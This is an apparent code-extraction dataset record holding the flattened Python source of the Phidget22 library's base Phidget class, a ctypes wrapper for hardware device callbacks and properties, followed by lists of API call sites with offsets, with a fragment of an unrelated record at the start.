'model_params.feature_size', 'output_dim': 'model_params.output_dim', 'planes': 'model_params.planes', 'layers': 'model_params.layers', 'num_top_down': 'model_params.num_top_down', 'conv0_kernel_size': 'model_params.conv0_kernel_size', 'block': 'model_params.block', 'pooling_method': 'model_params.pooling'}), '(in_channels=in_channels, feature_size=model_params.feature_size,\n output_dim=model_params.output_dim, planes=model_params.planes, layers=\n model_params.layers, num_top_down=model_params.num_top_down,\n conv0_kernel_size=model_params.conv0_kernel_size, block=model_params.\n block, pooling_method=model_params.pooling)\n', (388, 716), False, 'from models.minkloc import MinkLoc\n'), ((2025, 2089), 'models.minkgl.MinkHead', 'MinkHead', (['local_in_levels', 'local_in_channels', 'local_map_channels'], {}), '(local_in_levels, local_in_channels, local_map_channels)\n', (2033, 2089), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((856, 867), 'third_party.minkloc3d.minkloc.MinkLoc3D', 'MinkLoc3D', ([], {}), '()\n', (865, 867), False, 'from third_party.minkloc3d.minkloc import MinkLoc3D\n')]
import sys import ctypes from Phidget22.PhidgetSupport import PhidgetSupport from Phidget22.Async import * from Phidget22.ChannelClass import ChannelClass from Phidget22.ChannelSubclass import ChannelSubclass from Phidget22.DeviceClass import DeviceClass from Phidget22.DeviceID import DeviceID from Phidget22.ErrorEventCode import ErrorEventCode from Phidget22.PhidgetException import PhidgetException class Phidget: def __init__(self): self.handle = ctypes.c_void_p() if sys.platform == 'win32': self._AttachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p) else: self._AttachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p) self._Attach = None self._onAttach = None if sys.platform == 'win32': self._DetachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p) else: self._DetachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p) self._Detach = None self._onDetach = None if sys.platform == 'win32': self._ErrorFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p) else: self._ErrorFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p) self._Error = None self._onError = None if sys.platform == 'win32': self._PropertyChangeFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p) else: self._PropertyChangeFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p) self._PropertyChange = None self._onPropertyChange = None def __eq__(self, other): return hasattr(other, 'handle') and self.handle.value == other.handle.value def __hash__(self): return self.handle.value def __str__(self): _value = (ctypes.c_char * 65536)() _valueLen = ctypes.c_int32(65536) if self.getIsChannel(): __func = PhidgetSupport.getDll().channelInfo else: __func = PhidgetSupport.getDll().deviceInfo result = __func(self.handle, ctypes.byref(_value), _valueLen) return _value.value.decode('utf- 8') def __del__(self): __func = PhidgetSupport.getDll().Phidget_delete __func.restype = ctypes.c_int32 res = __func(ctypes.byref(self.handle)) self.handle = None if res > 0: raise PhidgetException(res) def _localAttachEvent(self, handle, userPtr): if self._Attach == None: return self._Attach(self) def setOnAttachHandler(self, handler): if handler == None: self._Attach = None self._onAttach = None else: self._Attach = handler self._onAttach = self._AttachFactory(self._localAttachEvent) try: __func = PhidgetSupport.getDll().Phidget_setOnAttachHandler __func.restype = ctypes.c_int32 res = __func(self.handle, self._onAttach, None) except RuntimeError: self._Attach = None self._onAttach = None def _localDetachEvent(self, handle, userPtr): if self._Detach == None: return self._Detach(self) def setOnDetachHandler(self, handler): if handler == None: self._Detach = None self._onDetach = None else: self._Detach = handler self._onDetach = self._DetachFactory(self._localDetachEvent) try: __func = PhidgetSupport.getDll().Phidget_setOnDetachHandler __func.restype = ctypes.c_int32 res = __func(self.handle, self._onDetach, None) except RuntimeError: self._Detach = None self._onDetach = None def _localErrorEvent(self, handle, userPtr, Code, Description): if self._Error == None: return Description = Description.decode('utf-8') self._Error(self, Code, Description) def setOnErrorHandler(self, handler): if handler == None: self._Error = None self._onError = None else: self._Error = handler self._onError = self._ErrorFactory(self._localErrorEvent) try: __func = PhidgetSupport.getDll().Phidget_setOnErrorHandler __func.restype = ctypes.c_int32 res = __func(self.handle, self._onError, None) except RuntimeError: self._Error = None self._onError = None def _localPropertyChangeEvent(self, handle, userPtr, propertyName): if self._PropertyChange == None: return propertyName = propertyName.decode('utf-8') self._PropertyChange(self, propertyName) def setOnPropertyChangeHandler(self, handler): if handler == None: self._PropertyChange = None self._onPropertyChange = None else: self._PropertyChange = handler self._onPropertyChange = self._PropertyChangeFactory(self._localPropertyChangeEvent) try: __func = PhidgetSupport.getDll().Phidget_setOnPropertyChangeHandler __func.restype = ctypes.c_int32 res = __func(self.handle, self._onPropertyChange, None) except RuntimeError: self._PropertyChange = None self._onPropertyChange = None @staticmethod def finalize(flags): _flags = ctypes.c_int32(flags) __func = PhidgetSupport.getDll().Phidget_finalize __func.restype = ctypes.c_int32 result = __func(_flags) if result > 0: raise PhidgetException(result) @staticmethod def getLibraryVersion(): _LibraryVersion = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getLibraryVersion __func.restype = ctypes.c_int32 result = __func(ctypes.byref(_LibraryVersion)) if result > 0: raise PhidgetException(result) return _LibraryVersion.value.decode('utf-8') @staticmethod def getLibraryVersionNumber(): _LibraryVersionNumber = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getLibraryVersionNumber __func.restype = ctypes.c_int32 result = __func(ctypes.byref(_LibraryVersionNumber)) if result > 0: raise PhidgetException(result) return _LibraryVersionNumber.value.decode('utf-8') @staticmethod def resetLibrary(): __func = PhidgetSupport.getDll().Phidget_resetLibrary __func.restype = ctypes.c_int32 result = __func() if result > 0: raise PhidgetException(result) def getAttached(self): _Attached = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getAttached __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_Attached)) if result > 0: raise PhidgetException(result) return _Attached.value def getChannel(self): _Channel = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getChannel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_Channel)) if result > 0: raise PhidgetException(result) return _Channel.value def setChannel(self, Channel): _Channel = ctypes.c_int(Channel) __func = PhidgetSupport.getDll().Phidget_setChannel __func.restype = ctypes.c_int32 result = __func(self.handle, _Channel) if result > 0: raise PhidgetException(result) def getChannelClass(self): _ChannelClass = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getChannelClass __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ChannelClass)) if result > 0: raise PhidgetException(result) return _ChannelClass.value def getChannelClassName(self): _ChannelClassName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getChannelClassName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ChannelClassName)) if result > 0: raise PhidgetException(result) return _ChannelClassName.value.decode('utf-8') def getChannelName(self): _ChannelName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getChannelName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ChannelName)) if result > 0: raise PhidgetException(result) return _ChannelName.value.decode('utf-8') def getChannelSubclass(self): _ChannelSubclass = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getChannelSubclass __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ChannelSubclass)) if result > 0: raise PhidgetException(result) return _ChannelSubclass.value def close(self): __func = PhidgetSupport.getDll().Phidget_close __func.restype = ctypes.c_int32 result = __func(self.handle) if result > 0: raise PhidgetException(result) def getDeviceChannelCount(self, cls): _cls = ctypes.c_int(cls) _count = ctypes.c_uint32() __func = PhidgetSupport.getDll().Phidget_getDeviceChannelCount __func.restype = ctypes.c_int32 result = __func(self.handle, _cls, ctypes.byref(_count)) if result > 0: raise PhidgetException(result) return _count.value def getDeviceClass(self): _DeviceClass = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getDeviceClass __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceClass)) if result > 0: raise PhidgetException(result) return _DeviceClass.value def getDeviceClassName(self): _DeviceClassName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getDeviceClassName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceClassName)) if result > 0: raise PhidgetException(result) return _DeviceClassName.value.decode('utf-8') def getDeviceID(self): _DeviceID = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getDeviceID __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceID)) if result > 0: raise PhidgetException(result) return _DeviceID.value def getDeviceLabel(self): _DeviceLabel = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getDeviceLabel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceLabel)) if result > 0: raise PhidgetException(result) return _DeviceLabel.value.decode('utf-8') def setDeviceLabel(self, DeviceLabel): _DeviceLabel = ctypes.create_string_buffer(DeviceLabel.encode('utf-8')) __func = PhidgetSupport.getDll().Phidget_setDeviceLabel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceLabel)) if result > 0: raise PhidgetException(result) def getDeviceName(self): _DeviceName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getDeviceName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceName)) if result > 0: raise PhidgetException(result) return _DeviceName.value.decode('utf-8') def getDeviceSerialNumber(self): _DeviceSerialNumber = ctypes.c_int32() __func = PhidgetSupport.getDll().Phidget_getDeviceSerialNumber __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceSerialNumber)) if result > 0: raise PhidgetException(result) return _DeviceSerialNumber.value def setDeviceSerialNumber(self, DeviceSerialNumber): _DeviceSerialNumber = ctypes.c_int32(DeviceSerialNumber) __func = PhidgetSupport.getDll().Phidget_setDeviceSerialNumber __func.restype = ctypes.c_int32 result = __func(self.handle, _DeviceSerialNumber) if result > 0: raise PhidgetException(result) def getDeviceSKU(self): _DeviceSKU = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getDeviceSKU __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceSKU)) if result > 0: raise PhidgetException(result) return _DeviceSKU.value.decode('utf-8') def getDeviceVersion(self): _DeviceVersion = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getDeviceVersion __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceVersion)) if result > 0: raise PhidgetException(result) return _DeviceVersion.value def getHub(self): _Hub = ctypes.c_void_p() __func = PhidgetSupport.getDll().Phidget_getHub __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_Hub)) if result > 0: raise PhidgetException(result) __Hub = Phidget() __Hub.handle = _Hub return __Hub def getHubPort(self): _HubPort = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getHubPort __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_HubPort)) if result > 0: raise PhidgetException(result) return _HubPort.value def setHubPort(self, HubPort): _HubPort = ctypes.c_int(HubPort) __func = PhidgetSupport.getDll().Phidget_setHubPort __func.restype = ctypes.c_int32 result = __func(self.handle, _HubPort) if result > 0: raise PhidgetException(result) def getHubPortCount(self): _HubPortCount = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getHubPortCount __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_HubPortCount)) if result > 0: raise PhidgetException(result) return _HubPortCount.value def getHubPortSpeed(self): _HubPortSpeed = ctypes.c_uint32() __func = PhidgetSupport.getDll().Phidget_getHubPortSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_HubPortSpeed)) if result > 0: raise PhidgetException(result) return _HubPortSpeed.value def setHubPortSpeed(self, HubPortSpeed): _HubPortSpeed = ctypes.c_uint32(HubPortSpeed) __func = PhidgetSupport.getDll().Phidget_setHubPortSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, _HubPortSpeed) if result > 0: raise PhidgetException(result) def getMaxHubPortSpeed(self): _MaxHubPortSpeed = ctypes.c_uint32() __func = PhidgetSupport.getDll().Phidget_getMaxHubPortSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_MaxHubPortSpeed)) if result > 0: raise PhidgetException(result) return _MaxHubPortSpeed.value def getHubPortSupportsSetSpeed(self): _HubPortSupportsSetSpeed = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getHubPortSupportsSetSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_HubPortSupportsSetSpeed)) if result > 0: raise PhidgetException(result) return _HubPortSupportsSetSpeed.value def getIsChannel(self): _IsChannel = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getIsChannel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_IsChannel)) if result > 0: raise PhidgetException(result) return _IsChannel.value def getIsHubPortDevice(self): _IsHubPortDevice = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getIsHubPortDevice __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_IsHubPortDevice)) if result > 0: raise PhidgetException(result) return _IsHubPortDevice.value def setIsHubPortDevice(self, IsHubPortDevice): _IsHubPortDevice = ctypes.c_int(IsHubPortDevice) __func = PhidgetSupport.getDll().Phidget_setIsHubPortDevice __func.restype = ctypes.c_int32 result = __func(self.handle, _IsHubPortDevice) if result > 0: raise PhidgetException(result) def getIsLocal(self): _IsLocal = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getIsLocal __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_IsLocal)) if result > 0: raise PhidgetException(result) return _IsLocal.value def setIsLocal(self, IsLocal): _IsLocal = ctypes.c_int(IsLocal) __func = PhidgetSupport.getDll().Phidget_setIsLocal __func.restype = ctypes.c_int32 result = __func(self.handle, _IsLocal) if result > 0: raise PhidgetException(result) def getIsRemote(self): _IsRemote = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getIsRemote __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_IsRemote)) if result > 0: raise PhidgetException(result) return _IsRemote.value def setIsRemote(self, IsRemote): _IsRemote = ctypes.c_int(IsRemote) __func = PhidgetSupport.getDll().Phidget_setIsRemote __func.restype = ctypes.c_int32 result = __func(self.handle, _IsRemote) if result > 0: raise PhidgetException(result) def open(self): __func = PhidgetSupport.getDll().Phidget_open __func.restype = ctypes.c_int32 result = __func(self.handle) if result > 0: raise PhidgetException(result) def openWaitForAttachment(self, timeout): _timeout = ctypes.c_uint32(timeout) __func = PhidgetSupport.getDll().Phidget_openWaitForAttachment __func.restype = ctypes.c_int32 result = __func(self.handle, _timeout) if result > 0: raise PhidgetException(result) def getParent(self): _Parent = ctypes.c_void_p() __func = PhidgetSupport.getDll().Phidget_getParent __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_Parent)) if result > 0: raise PhidgetException(result) __Parent = Phidget() __Parent.handle = _Parent return __Parent def getServerHostname(self): _ServerHostname = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getServerHostname __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerHostname)) if result > 0: raise PhidgetException(result) return _ServerHostname.value.decode('utf-8') def getServerName(self): _ServerName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getServerName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerName)) if result > 0: raise PhidgetException(result) return _ServerName.value.decode('utf-8') def setServerName(self, ServerName): _ServerName = ctypes.create_string_buffer(ServerName.encode('utf-8')) __func = PhidgetSupport.getDll().Phidget_setServerName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerName)) if result > 0: raise PhidgetException(result) def getServerPeerName(self): _ServerPeerName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getServerPeerName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerPeerName)) if result > 0: raise PhidgetException(result) return _ServerPeerName.value.decode('utf-8') def getServerUniqueName(self): _ServerUniqueName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getServerUniqueName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerUniqueName)) if result > 0: raise PhidgetException(result) return _ServerUniqueName.value.decode('utf-8') def getMaxVINTDeviceSpeed(self): _MaxVINTDeviceSpeed = ctypes.c_uint32() __func = PhidgetSupport.getDll().Phidget_getMaxVINTDeviceSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_MaxVINTDeviceSpeed)) if result > 0: raise PhidgetException(result) return _MaxVINTDeviceSpeed.value def getVINTDeviceSupportsSetSpeed(self): _VINTDeviceSupportsSetSpeed = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getVINTDeviceSupportsSetSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_VINTDeviceSupportsSetSpeed)) if result > 0: raise PhidgetException(result) return _VINTDeviceSupportsSetSpeed.value def writeDeviceLabel(self, deviceLabel): _deviceLabel = ctypes.create_string_buffer(deviceLabel.encode('utf-8')) __func = PhidgetSupport.getDll().Phidget_writeDeviceLabel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_deviceLabel)) if result > 0: raise PhidgetException(result) ANY_SERIAL_NUMBER = -1 ANY_HUB_PORT = -1 ANY_CHANNEL = -1 ANY_LABEL = None INFINITE_TIMEOUT = 0 DEFAULT_TIMEOUT = 1000
[ "ctypes.CFUNCTYPE", "ctypes.c_uint32", "ctypes.byref", "ctypes.c_int32", "Phidget22.PhidgetSupport.PhidgetSupport.getDll", "Phidget22.PhidgetException.PhidgetException", "ctypes.WINFUNCTYPE", "ctypes.c_int", "ctypes.c_void_p", "ctypes.c_char_p" ]
[((457, 474), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (472, 474), False, 'import ctypes\n'), ((1830, 1851), 'ctypes.c_int32', 'ctypes.c_int32', (['(65536)'], {}), '(65536)\n', (1844, 1851), False, 'import ctypes\n'), ((4772, 4793), 'ctypes.c_int32', 'ctypes.c_int32', (['flags'], {}), '(flags)\n', (4786, 4793), False, 'import ctypes\n'), ((5022, 5039), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (5037, 5039), False, 'import ctypes\n'), ((5359, 5376), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (5374, 5376), False, 'import ctypes\n'), ((5879, 5893), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (5891, 5893), False, 'import ctypes\n'), ((6155, 6169), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (6167, 6169), False, 'import ctypes\n'), ((6437, 6458), 'ctypes.c_int', 'ctypes.c_int', (['Channel'], {}), '(Channel)\n', (6449, 6458), False, 'import ctypes\n'), ((6689, 6703), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (6701, 6703), False, 'import ctypes\n'), ((6995, 7012), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (7010, 7012), False, 'import ctypes\n'), ((7322, 7339), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (7337, 7339), False, 'import ctypes\n'), ((7642, 7656), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (7654, 7656), False, 'import ctypes\n'), ((8137, 8154), 'ctypes.c_int', 'ctypes.c_int', (['cls'], {}), '(cls)\n', (8149, 8154), False, 'import ctypes\n'), ((8166, 8183), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (8181, 8183), False, 'import ctypes\n'), ((8463, 8477), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (8475, 8477), False, 'import ctypes\n'), ((8764, 8781), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (8779, 8781), False, 'import ctypes\n'), ((9082, 9096), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (9094, 9096), False, 'import ctypes\n'), ((9366, 9383), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (9381, 9383), False, 'import ctypes\n'), ((9996, 10013), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (10011, 10013), False, 'import ctypes\n'), ((10319, 10335), 'ctypes.c_int32', 'ctypes.c_int32', ([], {}), '()\n', (10333, 10335), False, 'import ctypes\n'), ((10669, 10703), 'ctypes.c_int32', 'ctypes.c_int32', (['DeviceSerialNumber'], {}), '(DeviceSerialNumber)\n', (10683, 10703), False, 'import ctypes\n'), ((10950, 10967), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (10965, 10967), False, 'import ctypes\n'), ((11260, 11274), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (11272, 11274), False, 'import ctypes\n'), ((11543, 11560), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (11558, 11560), False, 'import ctypes\n'), ((11844, 11858), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (11856, 11858), False, 'import ctypes\n'), ((12126, 12147), 'ctypes.c_int', 'ctypes.c_int', (['HubPort'], {}), '(HubPort)\n', (12138, 12147), False, 'import ctypes\n'), ((12378, 12392), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (12390, 12392), False, 'import ctypes\n'), ((12676, 12693), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (12691, 12693), False, 'import ctypes\n'), ((12991, 13020), 'ctypes.c_uint32', 'ctypes.c_uint32', (['HubPortSpeed'], {}), '(HubPortSpeed)\n', (13006, 13020), False, 'import ctypes\n'), ((13267, 13284), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (13282, 13284), False, 'import ctypes\n'), ((13599, 13613), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (13611, 13613), False, 'import ctypes\n'), ((13924, 13938), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (13936, 13938), False, 'import ctypes\n'), ((14219, 14233), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (14231, 14233), False, 'import ctypes\n'), ((14549, 14578), 'ctypes.c_int', 'ctypes.c_int', (['IsHubPortDevice'], {}), '(IsHubPortDevice)\n', (14561, 14578), False, 'import ctypes\n'), ((14815, 14829), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (14827, 14829), False, 'import ctypes\n'), ((15097, 15118), 'ctypes.c_int', 'ctypes.c_int', (['IsLocal'], {}), '(IsLocal)\n', (15109, 15118), False, 'import ctypes\n'), ((15341, 15355), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (15353, 15355), False, 'import ctypes\n'), ((15629, 15651), 'ctypes.c_int', 'ctypes.c_int', (['IsRemote'], {}), '(IsRemote)\n', (15641, 15651), False, 'import ctypes\n'), ((16078, 16102), 'ctypes.c_uint32', 'ctypes.c_uint32', (['timeout'], {}), '(timeout)\n', (16093, 16102), False, 'import ctypes\n'), ((16332, 16349), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (16347, 16349), False, 'import ctypes\n'), ((16665, 16682), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (16680, 16682), False, 'import ctypes\n'), ((16984, 17001), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (16999, 17001), False, 'import ctypes\n'), ((17613, 17630), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (17628, 17630), False, 'import ctypes\n'), ((17944, 17961), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (17959, 17961), False, 'import ctypes\n'), ((18285, 18302), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (18300, 18302), False, 'import ctypes\n'), ((18632, 18646), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (18644, 18646), False, 'import ctypes\n'), ((531, 589), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (549, 589), False, 'import ctypes\n'), ((623, 679), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (639, 679), False, 'import ctypes\n'), ((782, 840), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (800, 840), False, 'import ctypes\n'), ((874, 930), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (890, 930), False, 'import ctypes\n'), ((1032, 1125), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\n ctypes.c_char_p)\n', (1050, 1125), False, 'import ctypes\n'), ((1154, 1245), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\n ctypes.c_char_p)\n', (1170, 1245), False, 'import ctypes\n'), ((1350, 1425), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n', (1368, 1425), False, 'import ctypes\n'), ((1467, 1540), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n', (1483, 1540), False, 'import ctypes\n'), ((2012, 2032), 'ctypes.byref', 'ctypes.byref', (['_value'], {}), '(_value)\n', (2024, 2032), False, 'import ctypes\n'), ((2116, 2139), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (2137, 2139), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((2204, 2229), 'ctypes.byref', 'ctypes.byref', (['self.handle'], {}), '(self.handle)\n', (2216, 2229), False, 'import ctypes\n'), ((2275, 2296), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['res'], {}), '(res)\n', (2291, 2296), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((4806, 4829), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (4827, 4829), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((4934, 4958), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (4950, 4958), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5052, 5075), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5073, 5075), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5154, 5183), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersion'], {}), '(_LibraryVersion)\n', (5166, 5183), False, 'import ctypes\n'), ((5212, 5236), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5228, 5236), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5389, 5412), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5410, 5412), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5497, 5532), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersionNumber'], {}), '(_LibraryVersionNumber)\n', (5509, 5532), False, 'import ctypes\n'), ((5561, 5585), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5577, 5585), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5688, 5711), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5709, 5711), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5814, 5838), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5830, 5838), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5906, 5929), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5927, 5929), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6015, 6038), 'ctypes.byref', 'ctypes.byref', (['_Attached'], {}), '(_Attached)\n', (6027, 6038), False, 'import ctypes\n'), ((6067, 6091), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6083, 6091), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6182, 6205), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6203, 6205), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), 